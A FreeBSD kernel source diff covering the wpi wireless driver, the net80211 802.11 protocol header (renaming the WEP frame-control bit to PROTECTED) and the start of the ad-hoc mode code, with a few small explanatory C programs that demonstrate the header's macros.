*ifp = ic->ic_ifp; struct wpi_softc *sc = ifp->if_softc; WPI_LOCK(sc); wpi_set_led(sc, WPI_LED_LINK, 20, 2); WPI_UNLOCK(sc); } /** * Called by the net80211 framework, indicates that the * scan has ended. If there is a scan in progress on the card * then it should be aborted. */ static void wpi_scan_end(struct ieee80211com *ic) { /* XXX ignore */ } /** * Called by the net80211 framework to indicate to the driver * that the channel should be changed */ static void wpi_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct wpi_softc *sc = ifp->if_softc; int error; /* * Only need to set the channel in Monitor mode. AP scanning and auth * are already taken care of by their respective firmware commands. */ if (ic->ic_opmode == IEEE80211_M_MONITOR) { WPI_LOCK(sc); error = wpi_config(sc); WPI_UNLOCK(sc); if (error != 0) device_printf(sc->sc_dev, "error %d settting channel\n", error); } } /** * Called by net80211 to indicate that we need to scan the current * channel. The channel is previously be set via the wpi_set_channel * callback. */ static void wpi_scan_curchan(struct ieee80211_scan_state *ss, unsigned long maxdwell) { struct ieee80211vap *vap = ss->ss_vap; struct ifnet *ifp = vap->iv_ic->ic_ifp; struct wpi_softc *sc = ifp->if_softc; WPI_LOCK(sc); if (wpi_scan(sc)) ieee80211_cancel_scan(vap); WPI_UNLOCK(sc); } /** * Called by the net80211 framework to indicate * the minimum dwell time has been met, terminate the scan. * We don't actually terminate the scan as the firmware will notify * us when it's finished and we have no way to interrupt it. */ static void wpi_scan_mindwell(struct ieee80211_scan_state *ss) { /* NB: don't try to abort scan; wait for firmware to finish */ } static void wpi_hwreset(void *arg, int pending) { struct wpi_softc *sc = arg; WPI_LOCK(sc); wpi_init_locked(sc, 0); WPI_UNLOCK(sc); } static void wpi_rfreset(void *arg, int pending) { struct wpi_softc *sc = arg; WPI_LOCK(sc); wpi_rfkill_resume(sc); WPI_UNLOCK(sc); } /* * Allocate DMA-safe memory for firmware transfer. 
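 * Enough contiguous space for the largest main text plus data segment
 * is reserved up front, so firmware sections can be staged without
 * further allocations.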
*/ static int wpi_alloc_fwmem(struct wpi_softc *sc) { /* allocate enough contiguous space to store text and data */ return wpi_dma_contig_alloc(sc, &sc->fw_dma, NULL, WPI_FW_MAIN_TEXT_MAXSZ + WPI_FW_MAIN_DATA_MAXSZ, 1, BUS_DMA_NOWAIT); } static void wpi_free_fwmem(struct wpi_softc *sc) { wpi_dma_contig_free(&sc->fw_dma); } /** * Called every second, wpi_watchdog used by the watch dog timer * to check that the card is still alive */ static void wpi_watchdog(void *arg) { struct wpi_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; DPRINTFN(WPI_DEBUG_WATCHDOG,("Watchdog: tick\n")); if (sc->flags & WPI_FLAG_HW_RADIO_OFF) { /* No need to lock firmware memory */ tmp = wpi_mem_read(sc, WPI_MEM_HW_RADIO_OFF); if ((tmp & 0x1) == 0) { /* Radio kill switch is still off */ callout_reset(&sc->watchdog_to, hz, wpi_watchdog, sc); return; } device_printf(sc->sc_dev, "Hardware Switch Enabled\n"); ieee80211_runtask(ic, &sc->sc_radiotask); return; } if (sc->sc_tx_timer > 0) { if (--sc->sc_tx_timer == 0) { device_printf(sc->sc_dev,"device timeout\n"); ifp->if_oerrors++; ieee80211_runtask(ic, &sc->sc_restarttask); } } if (sc->sc_scan_timer > 0) { struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); if (--sc->sc_scan_timer == 0 && vap != NULL) { device_printf(sc->sc_dev,"scan timeout\n"); ieee80211_cancel_scan(vap); ieee80211_runtask(ic, &sc->sc_restarttask); } } if (ifp->if_drv_flags & IFF_DRV_RUNNING) callout_reset(&sc->watchdog_to, hz, wpi_watchdog, sc); } #ifdef WPI_DEBUG static const char *wpi_cmd_str(int cmd) { switch (cmd) { case WPI_DISABLE_CMD: return "WPI_DISABLE_CMD"; case WPI_CMD_CONFIGURE: return "WPI_CMD_CONFIGURE"; case WPI_CMD_ASSOCIATE: return "WPI_CMD_ASSOCIATE"; case WPI_CMD_SET_WME: return "WPI_CMD_SET_WME"; case WPI_CMD_TSF: return "WPI_CMD_TSF"; case WPI_CMD_ADD_NODE: return "WPI_CMD_ADD_NODE"; case WPI_CMD_TX_DATA: return "WPI_CMD_TX_DATA"; case WPI_CMD_MRR_SETUP: return "WPI_CMD_MRR_SETUP"; case WPI_CMD_SET_LED: return "WPI_CMD_SET_LED"; case WPI_CMD_SET_POWER_MODE: return "WPI_CMD_SET_POWER_MODE"; case WPI_CMD_SCAN: return "WPI_CMD_SCAN"; case WPI_CMD_SET_BEACON:return "WPI_CMD_SET_BEACON"; case WPI_CMD_TXPOWER: return "WPI_CMD_TXPOWER"; case WPI_CMD_BLUETOOTH: return "WPI_CMD_BLUETOOTH"; default: KASSERT(1, ("Unknown Command: %d\n", cmd)); return "UNKNOWN CMD"; /* Make the compiler happy */ } } #endif MODULE_DEPEND(wpi, pci, 1, 1, 1); MODULE_DEPEND(wpi, wlan, 1, 1, 1); MODULE_DEPEND(wpi, firmware, 1, 1, 1); diff --git a/sys/net80211/ieee80211.h b/sys/net80211/ieee80211.h index 0b1f05027393..9b005f3d6b89 100644 --- a/sys/net80211/ieee80211.h +++ b/sys/net80211/ieee80211.h @@ -1,1118 +1,1118 @@ /*- * Copyright (c) 2001 Atsushi Onoe * Copyright (c) 2002-2009 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * $FreeBSD$ */ #ifndef _NET80211_IEEE80211_H_ #define _NET80211_IEEE80211_H_ /* * 802.11 protocol definitions. */ #define IEEE80211_ADDR_LEN 6 /* size of 802.11 address */ /* is 802.11 address multicast/broadcast? */ #define IEEE80211_IS_MULTICAST(_a) (*(_a) & 0x01) typedef uint16_t ieee80211_seq; /* IEEE 802.11 PLCP header */ struct ieee80211_plcp_hdr { uint16_t i_sfd; uint8_t i_signal; uint8_t i_service; uint16_t i_length; uint16_t i_crc; } __packed; #define IEEE80211_PLCP_SFD 0xF3A0 #define IEEE80211_PLCP_SERVICE 0x00 #define IEEE80211_PLCP_SERVICE_LOCKED 0x04 #define IEEE80211_PLCL_SERVICE_PBCC 0x08 #define IEEE80211_PLCP_SERVICE_LENEXT5 0x20 #define IEEE80211_PLCP_SERVICE_LENEXT6 0x40 #define IEEE80211_PLCP_SERVICE_LENEXT7 0x80 /* * generic definitions for IEEE 802.11 frames */ struct ieee80211_frame { uint8_t i_fc[2]; uint8_t i_dur[2]; uint8_t i_addr1[IEEE80211_ADDR_LEN]; uint8_t i_addr2[IEEE80211_ADDR_LEN]; uint8_t i_addr3[IEEE80211_ADDR_LEN]; uint8_t i_seq[2]; /* possibly followed by addr4[IEEE80211_ADDR_LEN]; */ /* see below */ } __packed; struct ieee80211_qosframe { uint8_t i_fc[2]; uint8_t i_dur[2]; uint8_t i_addr1[IEEE80211_ADDR_LEN]; uint8_t i_addr2[IEEE80211_ADDR_LEN]; uint8_t i_addr3[IEEE80211_ADDR_LEN]; uint8_t i_seq[2]; uint8_t i_qos[2]; /* possibly followed by addr4[IEEE80211_ADDR_LEN]; */ /* see below */ } __packed; struct ieee80211_qoscntl { uint8_t i_qos[2]; }; struct ieee80211_frame_addr4 { uint8_t i_fc[2]; uint8_t i_dur[2]; uint8_t i_addr1[IEEE80211_ADDR_LEN]; uint8_t i_addr2[IEEE80211_ADDR_LEN]; uint8_t i_addr3[IEEE80211_ADDR_LEN]; uint8_t i_seq[2]; uint8_t i_addr4[IEEE80211_ADDR_LEN]; } __packed; struct ieee80211_qosframe_addr4 { uint8_t i_fc[2]; uint8_t i_dur[2]; uint8_t i_addr1[IEEE80211_ADDR_LEN]; uint8_t i_addr2[IEEE80211_ADDR_LEN]; uint8_t i_addr3[IEEE80211_ADDR_LEN]; uint8_t i_seq[2]; uint8_t i_addr4[IEEE80211_ADDR_LEN]; uint8_t i_qos[2]; } __packed; #define IEEE80211_FC0_VERSION_MASK 0x03 #define IEEE80211_FC0_VERSION_SHIFT 0 #define IEEE80211_FC0_VERSION_0 0x00 #define IEEE80211_FC0_TYPE_MASK 0x0c #define IEEE80211_FC0_TYPE_SHIFT 2 #define IEEE80211_FC0_TYPE_MGT 0x00 #define IEEE80211_FC0_TYPE_CTL 0x04 #define IEEE80211_FC0_TYPE_DATA 0x08 #define IEEE80211_FC0_SUBTYPE_MASK 0xf0 #define IEEE80211_FC0_SUBTYPE_SHIFT 4 /* for TYPE_MGT */ #define IEEE80211_FC0_SUBTYPE_ASSOC_REQ 0x00 #define IEEE80211_FC0_SUBTYPE_ASSOC_RESP 0x10 #define IEEE80211_FC0_SUBTYPE_REASSOC_REQ 0x20 #define IEEE80211_FC0_SUBTYPE_REASSOC_RESP 0x30 #define IEEE80211_FC0_SUBTYPE_PROBE_REQ 0x40 #define IEEE80211_FC0_SUBTYPE_PROBE_RESP 0x50 #define IEEE80211_FC0_SUBTYPE_BEACON 0x80 #define IEEE80211_FC0_SUBTYPE_ATIM 0x90 #define IEEE80211_FC0_SUBTYPE_DISASSOC 0xa0 #define IEEE80211_FC0_SUBTYPE_AUTH 0xb0 #define IEEE80211_FC0_SUBTYPE_DEAUTH 0xc0 #define IEEE80211_FC0_SUBTYPE_ACTION 0xd0 #define IEEE80211_FC0_SUBTYPE_ACTION_NOACK 0xe0 /* for TYPE_CTL */ #define IEEE80211_FC0_SUBTYPE_BAR 0x80 #define IEEE80211_FC0_SUBTYPE_BA 0x90 #define IEEE80211_FC0_SUBTYPE_PS_POLL 0xa0 #define 
IEEE80211_FC0_SUBTYPE_RTS 0xb0 #define IEEE80211_FC0_SUBTYPE_CTS 0xc0 #define IEEE80211_FC0_SUBTYPE_ACK 0xd0 #define IEEE80211_FC0_SUBTYPE_CF_END 0xe0 #define IEEE80211_FC0_SUBTYPE_CF_END_ACK 0xf0 /* for TYPE_DATA (bit combination) */ #define IEEE80211_FC0_SUBTYPE_DATA 0x00 #define IEEE80211_FC0_SUBTYPE_CF_ACK 0x10 #define IEEE80211_FC0_SUBTYPE_CF_POLL 0x20 #define IEEE80211_FC0_SUBTYPE_CF_ACPL 0x30 #define IEEE80211_FC0_SUBTYPE_NODATA 0x40 #define IEEE80211_FC0_SUBTYPE_CFACK 0x50 #define IEEE80211_FC0_SUBTYPE_CFPOLL 0x60 #define IEEE80211_FC0_SUBTYPE_CF_ACK_CF_ACK 0x70 #define IEEE80211_FC0_SUBTYPE_QOS 0x80 #define IEEE80211_FC0_SUBTYPE_QOS_NULL 0xc0 #define IEEE80211_FC1_DIR_MASK 0x03 #define IEEE80211_FC1_DIR_NODS 0x00 /* STA->STA */ #define IEEE80211_FC1_DIR_TODS 0x01 /* STA->AP */ #define IEEE80211_FC1_DIR_FROMDS 0x02 /* AP ->STA */ #define IEEE80211_FC1_DIR_DSTODS 0x03 /* AP ->AP */ #define IEEE80211_IS_DSTODS(wh) \ (((wh)->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) #define IEEE80211_FC1_MORE_FRAG 0x04 #define IEEE80211_FC1_RETRY 0x08 #define IEEE80211_FC1_PWR_MGT 0x10 #define IEEE80211_FC1_MORE_DATA 0x20 -#define IEEE80211_FC1_WEP 0x40 +#define IEEE80211_FC1_PROTECTED 0x40 #define IEEE80211_FC1_ORDER 0x80 #define IEEE80211_SEQ_FRAG_MASK 0x000f #define IEEE80211_SEQ_FRAG_SHIFT 0 #define IEEE80211_SEQ_SEQ_MASK 0xfff0 #define IEEE80211_SEQ_SEQ_SHIFT 4 #define IEEE80211_SEQ_RANGE 4096 #define IEEE80211_SEQ_ADD(seq, incr) \ (((seq) + (incr)) & (IEEE80211_SEQ_RANGE-1)) #define IEEE80211_SEQ_INC(seq) IEEE80211_SEQ_ADD(seq,1) #define IEEE80211_SEQ_SUB(a, b) \ (((a) + IEEE80211_SEQ_RANGE - (b)) & (IEEE80211_SEQ_RANGE-1)) #define IEEE80211_SEQ_BA_RANGE 2048 /* 2^11 */ #define IEEE80211_SEQ_BA_BEFORE(a, b) \ (IEEE80211_SEQ_SUB(b, a+1) < IEEE80211_SEQ_BA_RANGE-1) #define IEEE80211_NWID_LEN 32 #define IEEE80211_MESHID_LEN 32 #define IEEE80211_QOS_TXOP 0x00ff /* bit 8 is reserved */ #define IEEE80211_QOS_AMSDU 0x80 #define IEEE80211_QOS_AMSDU_S 7 #define IEEE80211_QOS_ACKPOLICY 0x60 #define IEEE80211_QOS_ACKPOLICY_S 5 #define IEEE80211_QOS_ACKPOLICY_NOACK 0x20 /* No ACK required */ #define IEEE80211_QOS_ACKPOLICY_BA 0x60 /* Block ACK */ #define IEEE80211_QOS_EOSP 0x10 /* EndOfService Period*/ #define IEEE80211_QOS_EOSP_S 4 #define IEEE80211_QOS_TID 0x0f /* qos[1] byte used for all frames sent by mesh STAs in a mesh BSS */ #define IEEE80211_QOS_MC 0x01 /* Mesh control */ /* Mesh power save level*/ #define IEEE80211_QOS_MESH_PSL 0x02 /* Mesh Receiver Service Period Initiated */ #define IEEE80211_QOS_RSPI 0x04 /* bits 11 to 15 reserved */ /* does frame have QoS sequence control data */ #define IEEE80211_QOS_HAS_SEQ(wh) \ (((wh)->i_fc[0] & \ (IEEE80211_FC0_TYPE_MASK | IEEE80211_FC0_SUBTYPE_QOS)) == \ (IEEE80211_FC0_TYPE_DATA | IEEE80211_FC0_SUBTYPE_QOS)) /* * WME/802.11e information element. 
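
As a side note, the frame-control and sequence-control masks above are all that is needed to pick a received header apart, which is exactly what the input paths later in this patch do; a small self-contained sketch (the raw values here are invented, and in the kernel the 16-bit sequence field is first converted with le16toh()):

#include <stdio.h>
#include <stdint.h>

#define IEEE80211_FC0_TYPE_MASK		0x0c
#define IEEE80211_FC0_SUBTYPE_MASK	0xf0
#define IEEE80211_SEQ_FRAG_MASK		0x000f
#define IEEE80211_SEQ_FRAG_SHIFT	0
#define IEEE80211_SEQ_SEQ_MASK		0xfff0
#define IEEE80211_SEQ_SEQ_SHIFT		4
#define IEEE80211_SEQ_RANGE		4096
#define IEEE80211_SEQ_SUB(a, b) \
	(((a) + IEEE80211_SEQ_RANGE - (b)) & (IEEE80211_SEQ_RANGE-1))

int
main(void)
{
	uint8_t fc0 = 0x88;		/* type DATA (0x08), subtype QOS (0x80) */
	uint16_t rxseq = 0x1234;	/* host-order sequence control field */

	printf("type 0x%02x subtype 0x%02x\n",
	    fc0 & IEEE80211_FC0_TYPE_MASK, fc0 & IEEE80211_FC0_SUBTYPE_MASK);
	printf("seqno %d fragno %d\n",
	    (rxseq & IEEE80211_SEQ_SEQ_MASK) >> IEEE80211_SEQ_SEQ_SHIFT,
	    (rxseq & IEEE80211_SEQ_FRAG_MASK) >> IEEE80211_SEQ_FRAG_SHIFT);
	/* 0x1234 -> seqno 291, fragno 4 */

	/* modulo-4096 distance, e.g. across the wrap from 4090 to 5 */
	printf("delta %d\n", IEEE80211_SEQ_SUB(5, 4090));	/* 11 */
	return 0;
}
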
*/ struct ieee80211_wme_info { uint8_t wme_id; /* IEEE80211_ELEMID_VENDOR */ uint8_t wme_len; /* length in bytes */ uint8_t wme_oui[3]; /* 0x00, 0x50, 0xf2 */ uint8_t wme_type; /* OUI type */ uint8_t wme_subtype; /* OUI subtype */ uint8_t wme_version; /* spec revision */ uint8_t wme_info; /* QoS info */ } __packed; /* * WME/802.11e Tspec Element */ struct ieee80211_wme_tspec { uint8_t ts_id; uint8_t ts_len; uint8_t ts_oui[3]; uint8_t ts_oui_type; uint8_t ts_oui_subtype; uint8_t ts_version; uint8_t ts_tsinfo[3]; uint8_t ts_nom_msdu[2]; uint8_t ts_max_msdu[2]; uint8_t ts_min_svc[4]; uint8_t ts_max_svc[4]; uint8_t ts_inactv_intv[4]; uint8_t ts_susp_intv[4]; uint8_t ts_start_svc[4]; uint8_t ts_min_rate[4]; uint8_t ts_mean_rate[4]; uint8_t ts_max_burst[4]; uint8_t ts_min_phy[4]; uint8_t ts_peak_rate[4]; uint8_t ts_delay[4]; uint8_t ts_surplus[2]; uint8_t ts_medium_time[2]; } __packed; /* * WME AC parameter field */ struct ieee80211_wme_acparams { uint8_t acp_aci_aifsn; uint8_t acp_logcwminmax; uint16_t acp_txop; } __packed; #define WME_NUM_AC 4 /* 4 AC categories */ #define WME_NUM_TID 16 /* 16 tids */ #define WME_PARAM_ACI 0x60 /* Mask for ACI field */ #define WME_PARAM_ACI_S 5 /* Shift for ACI field */ #define WME_PARAM_ACM 0x10 /* Mask for ACM bit */ #define WME_PARAM_ACM_S 4 /* Shift for ACM bit */ #define WME_PARAM_AIFSN 0x0f /* Mask for aifsn field */ #define WME_PARAM_AIFSN_S 0 /* Shift for aifsn field */ #define WME_PARAM_LOGCWMIN 0x0f /* Mask for CwMin field (in log) */ #define WME_PARAM_LOGCWMIN_S 0 /* Shift for CwMin field */ #define WME_PARAM_LOGCWMAX 0xf0 /* Mask for CwMax field (in log) */ #define WME_PARAM_LOGCWMAX_S 4 /* Shift for CwMax field */ #define WME_AC_TO_TID(_ac) ( \ ((_ac) == WME_AC_VO) ? 6 : \ ((_ac) == WME_AC_VI) ? 5 : \ ((_ac) == WME_AC_BK) ? 1 : \ 0) #define TID_TO_WME_AC(_tid) ( \ ((_tid) == 0 || (_tid) == 3) ? WME_AC_BE : \ ((_tid) < 3) ? WME_AC_BK : \ ((_tid) < 6) ? 
WME_AC_VI : \ WME_AC_VO) /* * WME Parameter Element */ struct ieee80211_wme_param { uint8_t param_id; uint8_t param_len; uint8_t param_oui[3]; uint8_t param_oui_type; uint8_t param_oui_subtype; uint8_t param_version; uint8_t param_qosInfo; #define WME_QOSINFO_COUNT 0x0f /* Mask for param count field */ uint8_t param_reserved; struct ieee80211_wme_acparams params_acParams[WME_NUM_AC]; } __packed; /* * Management Notification Frame */ struct ieee80211_mnf { uint8_t mnf_category; uint8_t mnf_action; uint8_t mnf_dialog; uint8_t mnf_status; } __packed; #define MNF_SETUP_REQ 0 #define MNF_SETUP_RESP 1 #define MNF_TEARDOWN 2 /* * 802.11n Management Action Frames */ /* generic frame format */ struct ieee80211_action { uint8_t ia_category; uint8_t ia_action; } __packed; #define IEEE80211_ACTION_CAT_SM 0 /* Spectrum Management */ #define IEEE80211_ACTION_CAT_QOS 1 /* QoS */ #define IEEE80211_ACTION_CAT_DLS 2 /* DLS */ #define IEEE80211_ACTION_CAT_BA 3 /* BA */ #define IEEE80211_ACTION_CAT_HT 7 /* HT */ #define IEEE80211_ACTION_CAT_MESH 13 /* Mesh */ #define IEEE80211_ACTION_CAT_SELF_PROT 15 /* Self-protected */ /* 16 - 125 reserved */ #define IEEE80211_ACTION_CAT_VENDOR 127 /* Vendor Specific */ #define IEEE80211_ACTION_HT_TXCHWIDTH 0 /* recommended xmit chan width*/ #define IEEE80211_ACTION_HT_MIMOPWRSAVE 1 /* MIMO power save */ /* HT - recommended transmission channel width */ struct ieee80211_action_ht_txchwidth { struct ieee80211_action at_header; uint8_t at_chwidth; } __packed; #define IEEE80211_A_HT_TXCHWIDTH_20 0 #define IEEE80211_A_HT_TXCHWIDTH_2040 1 /* HT - MIMO Power Save (NB: D2.04) */ struct ieee80211_action_ht_mimopowersave { struct ieee80211_action am_header; uint8_t am_control; } __packed; #define IEEE80211_A_HT_MIMOPWRSAVE_ENA 0x01 /* PS enabled */ #define IEEE80211_A_HT_MIMOPWRSAVE_MODE 0x02 #define IEEE80211_A_HT_MIMOPWRSAVE_MODE_S 1 #define IEEE80211_A_HT_MIMOPWRSAVE_DYNAMIC 0x02 /* Dynamic Mode */ #define IEEE80211_A_HT_MIMOPWRSAVE_STATIC 0x00 /* no SM packets */ /* bits 2-7 reserved */ /* Block Ack actions */ #define IEEE80211_ACTION_BA_ADDBA_REQUEST 0 /* ADDBA request */ #define IEEE80211_ACTION_BA_ADDBA_RESPONSE 1 /* ADDBA response */ #define IEEE80211_ACTION_BA_DELBA 2 /* DELBA */ /* Block Ack Parameter Set */ #define IEEE80211_BAPS_BUFSIZ 0xffc0 /* buffer size */ #define IEEE80211_BAPS_BUFSIZ_S 6 #define IEEE80211_BAPS_TID 0x003c /* TID */ #define IEEE80211_BAPS_TID_S 2 #define IEEE80211_BAPS_POLICY 0x0002 /* block ack policy */ #define IEEE80211_BAPS_POLICY_S 1 #define IEEE80211_BAPS_POLICY_DELAYED (0< IEEE80211_MIN_LEN. The default * mtu is Ethernet-compatible; it's set by ether_ifattach. */ #define IEEE80211_MTU_MAX 2290 #define IEEE80211_MTU_MIN 32 #define IEEE80211_MAX_LEN (2300 + IEEE80211_CRC_LEN + \ (IEEE80211_WEP_IVLEN + IEEE80211_WEP_KIDLEN + IEEE80211_WEP_CRCLEN)) #define IEEE80211_ACK_LEN \ (sizeof(struct ieee80211_frame_ack) + IEEE80211_CRC_LEN) #define IEEE80211_MIN_LEN \ (sizeof(struct ieee80211_frame_min) + IEEE80211_CRC_LEN) /* * The 802.11 spec says at most 2007 stations may be * associated at once. For most AP's this is way more * than is feasible so we use a default of IEEE80211_AID_DEF. * This number may be overridden by the driver and/or by * user configuration but may not be less than IEEE80211_AID_MIN * (see _ieee80211.h for implementation-specific settings). */ #define IEEE80211_AID_MAX 2007 #define IEEE80211_AID(b) ((b) &~ 0xc000) /* * RTS frame length parameters. 
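
The WME_AC_TO_TID()/TID_TO_WME_AC() macros defined earlier in this header encode the usual 802.11e UP-to-access-category table; a quick sketch that prints the whole mapping. The WME_AC_* numbering (BE=0, BK=1, VI=2, VO=3) is assumed from net80211's _ieee80211.h and repeated here only to keep the example self-contained:

#include <stdio.h>

enum { WME_AC_BE = 0, WME_AC_BK = 1, WME_AC_VI = 2, WME_AC_VO = 3 };

#define TID_TO_WME_AC(_tid) ( \
	((_tid) == 0 || (_tid) == 3) ? WME_AC_BE : \
	((_tid) < 3) ? WME_AC_BK : \
	((_tid) < 6) ? WME_AC_VI : \
	WME_AC_VO)

int
main(void)
{
	static const char *names[] = { "BE", "BK", "VI", "VO" };
	int tid;

	/* TIDs 0,3 -> BE; 1,2 -> BK; 4,5 -> VI; 6,7 -> VO */
	for (tid = 0; tid < 8; tid++)
		printf("tid %d -> %s\n", tid, names[TID_TO_WME_AC(tid)]);
	return 0;
}
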
The default is specified in * the 802.11 spec as 512; we treat it as implementation-dependent * so it's defined in ieee80211_var.h. The max may be wrong * for jumbo frames. */ #define IEEE80211_RTS_MIN 1 #define IEEE80211_RTS_MAX 2346 /* * TX fragmentation parameters. As above for RTS, we treat * default as implementation-dependent so define it elsewhere. */ #define IEEE80211_FRAG_MIN 256 #define IEEE80211_FRAG_MAX 2346 /* * Beacon interval (TU's). Min+max come from WiFi requirements. * As above, we treat default as implementation-dependent so * define it elsewhere. */ #define IEEE80211_BINTVAL_MAX 1000 /* max beacon interval (TU's) */ #define IEEE80211_BINTVAL_MIN 25 /* min beacon interval (TU's) */ /* * DTIM period (beacons). Min+max are not really defined * by the protocol but we want them publicly visible so * define them here. */ #define IEEE80211_DTIM_MAX 15 /* max DTIM period */ #define IEEE80211_DTIM_MIN 1 /* min DTIM period */ /* * Beacon miss threshold (beacons). As for DTIM, we define * them here to be publicly visible. Note the max may be * clamped depending on device capabilities. */ #define IEEE80211_HWBMISS_MIN 1 #define IEEE80211_HWBMISS_MAX 255 /* * 802.11 frame duration definitions. */ struct ieee80211_duration { uint16_t d_rts_dur; uint16_t d_data_dur; uint16_t d_plcp_len; uint8_t d_residue; /* unused octets in time slot */ }; /* One Time Unit (TU) is 1Kus = 1024 microseconds. */ #define IEEE80211_DUR_TU 1024 /* IEEE 802.11b durations for DSSS PHY in microseconds */ #define IEEE80211_DUR_DS_LONG_PREAMBLE 144 #define IEEE80211_DUR_DS_SHORT_PREAMBLE 72 #define IEEE80211_DUR_DS_SLOW_PLCPHDR 48 #define IEEE80211_DUR_DS_FAST_PLCPHDR 24 #define IEEE80211_DUR_DS_SLOW_ACK 112 #define IEEE80211_DUR_DS_FAST_ACK 56 #define IEEE80211_DUR_DS_SLOW_CTS 112 #define IEEE80211_DUR_DS_FAST_CTS 56 #define IEEE80211_DUR_DS_SLOT 20 #define IEEE80211_DUR_DS_SIFS 10 #define IEEE80211_DUR_DS_PIFS (IEEE80211_DUR_DS_SIFS + IEEE80211_DUR_DS_SLOT) #define IEEE80211_DUR_DS_DIFS (IEEE80211_DUR_DS_SIFS + \ 2 * IEEE80211_DUR_DS_SLOT) #define IEEE80211_DUR_DS_EIFS (IEEE80211_DUR_DS_SIFS + \ IEEE80211_DUR_DS_SLOW_ACK + \ IEEE80211_DUR_DS_LONG_PREAMBLE + \ IEEE80211_DUR_DS_SLOW_PLCPHDR + \ IEEE80211_DUR_DIFS) #endif /* _NET80211_IEEE80211_H_ */ diff --git a/sys/net80211/ieee80211_adhoc.c b/sys/net80211/ieee80211_adhoc.c index e40a238d6140..181b9220de62 100644 --- a/sys/net80211/ieee80211_adhoc.c +++ b/sys/net80211/ieee80211_adhoc.c @@ -1,958 +1,958 @@ /*- * Copyright (c) 2007-2009 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #ifdef __FreeBSD__ __FBSDID("$FreeBSD$"); #endif /* * IEEE 802.11 IBSS mode support. */ #include "opt_inet.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #ifdef IEEE80211_SUPPORT_TDMA #include #endif #include #define IEEE80211_RATE2MBS(r) (((r) & IEEE80211_RATE_VAL) / 2) static void adhoc_vattach(struct ieee80211vap *); static int adhoc_newstate(struct ieee80211vap *, enum ieee80211_state, int); static int adhoc_input(struct ieee80211_node *, struct mbuf *, int, int); static void adhoc_recv_mgmt(struct ieee80211_node *, struct mbuf *, int subtype, int, int); static void ahdemo_recv_mgmt(struct ieee80211_node *, struct mbuf *, int subtype, int, int); static void adhoc_recv_ctl(struct ieee80211_node *, struct mbuf *, int subtype); void ieee80211_adhoc_attach(struct ieee80211com *ic) { ic->ic_vattach[IEEE80211_M_IBSS] = adhoc_vattach; ic->ic_vattach[IEEE80211_M_AHDEMO] = adhoc_vattach; } void ieee80211_adhoc_detach(struct ieee80211com *ic) { } static void adhoc_vdetach(struct ieee80211vap *vap) { } static void adhoc_vattach(struct ieee80211vap *vap) { vap->iv_newstate = adhoc_newstate; vap->iv_input = adhoc_input; if (vap->iv_opmode == IEEE80211_M_IBSS) vap->iv_recv_mgmt = adhoc_recv_mgmt; else vap->iv_recv_mgmt = ahdemo_recv_mgmt; vap->iv_recv_ctl = adhoc_recv_ctl; vap->iv_opdetach = adhoc_vdetach; #ifdef IEEE80211_SUPPORT_TDMA /* * Throw control to tdma support. Note we do this * after setting up our callbacks so it can piggyback * on top of us. */ if (vap->iv_caps & IEEE80211_C_TDMA) ieee80211_tdma_vattach(vap); #endif } static void sta_leave(void *arg, struct ieee80211_node *ni) { struct ieee80211vap *vap = arg; if (ni->ni_vap == vap && ni != vap->iv_bss) ieee80211_node_leave(ni); } /* * IEEE80211_M_IBSS+IEEE80211_M_AHDEMO vap state machine handler. */ static int adhoc_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_node *ni; enum ieee80211_state ostate; 